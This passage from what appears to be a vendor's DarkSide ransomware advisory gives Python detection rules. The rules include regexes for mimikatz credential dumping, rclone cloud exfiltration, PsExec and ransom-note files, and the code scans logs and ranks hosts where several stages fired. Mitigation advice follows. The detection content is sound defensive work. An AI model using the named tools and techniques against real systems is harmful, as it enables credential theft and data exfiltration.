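    ("PsExec service execution", "T1569.002", re.compile(r"\bPSEXESVC\b", re.I)),
    ("credential dumping tool", "T1003", re.compile(r"\bmimikatz\b", re.I)),
    ("Rclone cloud exfiltration", "T1567.002",
     re.compile(r"\brclone(\.exe)?\s+(copy|sync|move)\b", re.I)),
    ("remote access software", "T1219", re.compile(r"\bTeamViewer\.exe\b", re.I)),
    ("DarkSide ransom note dropped", "T1486",
     re.compile(r"\bREADME\.[0-9a-z]+\.TXT\b", re.I)),
]


def scan(lines):
    """Return (host, rule name, technique) for every log line that matches a rule."""
    hits = []
    for line in lines:
        host, rest = (part.strip() for part in line.split("|", 1))
        for name, technique, pattern in RULES:
            if pattern.search(rest):
                hits.append((host, name, technique))
    return hits


def hosts_with_multiple_stages(hits, minimum=2):
    """Hosts where at least `minimum` distinct techniques fired. A chain of
    execution, exfiltration and impact is a far stronger signal than one alert."""
    per_host = {}
    for host, _, technique in hits:
        per_host.setdefault(host, set()).add(technique)
    return sorted(host for host, techs in per_host.items() if len(techs) >= minimum)
```

Hosts returned by hosts_with_multiple_stages are the ones where several stages of the attack chain described above have already been seen, and so the ones to triage first.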

Proficio has already deployed a wide variety of use cases that can be effectively utilized to detect such common indicators or activities. Of course, the effectiveness of the use cases depends on the log sources being monitored and their visibility into the environment or network. We recommend reaching out to your security advisors or client success managers to understand the use cases deployed for your environment and how we can work together to increase the efficacy of our monitoring, detection and discovery efforts.

The Proficio Threat Intelligence Team will continue to research and investigate all new threats to identify the best way to start a threat hunting campaign. And as always, we will keep all of our clients informed on our efforts in this area.

Precautionary Measures

Prevention is better than cure. It is advisable to safeguard yourself and your organization to avoid becoming the next victim of these ransomware attacks. We recommend that organizations consider the following measures:

  • Keep your anti-virus software, EDR solutions and other security tools installed on your systems updated to detect and prevent the spread of ransomware.
  • Perform regular backups of critical files and systems.
  • Keep your operating systems and accessible services up to date with the latest security patches.
  • Make use of Multi-Factor Authentication to govern access as much as possible.
  • Make use of network segmentation alongside the zero-trust model.
  • Close unnecessary network ports to reduce entry points for attackers.
  • Apply content filters on email gateways and email systems to prevent malicious content from reaching users and reduce the chance of a compromise.
  • Educate your employees and users to improve cybersecurity awareness.